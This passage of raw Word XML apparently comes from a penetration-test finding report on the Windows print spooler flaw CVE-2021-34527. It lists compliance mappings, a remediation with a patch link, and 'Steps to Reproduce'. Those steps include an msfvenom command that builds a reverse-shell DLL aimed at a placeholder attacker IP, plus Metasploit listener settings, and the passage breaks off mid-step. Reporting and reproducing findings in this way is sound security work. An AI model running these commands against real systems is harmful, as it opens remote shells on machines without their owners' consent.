              <w:t>PCI-DSS (5) - Protect all systems against malware and regularly update anti-virus software or programs</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="6106654E" w14:textId="45B54E14">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">TSA Cybersecurity Directive (4) </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>-  Reduce</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> the risk of exploitation of unpatched systems through the application of security patches and updates for operating systems, applications, </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>drivers</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> and firmware on critical cyber systems </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>in a timely manner</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> using a risk-based </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>methodology</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="6D7837E1">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="7ED9DBD2" w14:textId="2D547613">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7636" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="733793CE" w14:textId="3A528525">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Applying the necessary Windows security patch that has been released since July 2021</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="3C83AD93" w14:textId="4C2AE793">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:hyperlink r:id="R321c81f7489f4a39">
              <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="31268B33">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9488" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="238F553F" w14:textId="6D78C178">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Steps to Reproduce</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="3418CE7C">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9488" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="2B9FD733" w14:textId="7C2F1AC3">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">1.) Download the latest version of </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Impacket</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="42590D9B" w14:textId="66DFC36A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">2.) Generate a reverse shell payload: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="3B6E2783" w14:textId="5E571F87">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p windows/x64/</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>shell_reverse_tcp</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> LHOST=&lt;Attacker IP Address&gt; LPORT=&lt;attacker port&gt;-f </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>dll</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; shell.dll</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="7A957636" w14:textId="6C38F376">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">3.) Create </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>metasploit</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> listener:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="7FD696C4" w14:textId="1A419248">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="56B75D16" w14:textId="690BE3F7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>use exploit/multi/handler</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="3C7EF6AD" w14:textId="72EF55B4">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>SET LPORT=&lt;attacker port&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="524ED55B" w14:textId="060E6E7E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>SET LHOST=&lt;attacker IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="7F6AD4B0" w14:textId="0C19189D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>SET PAYLOAD = windows/x64/</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
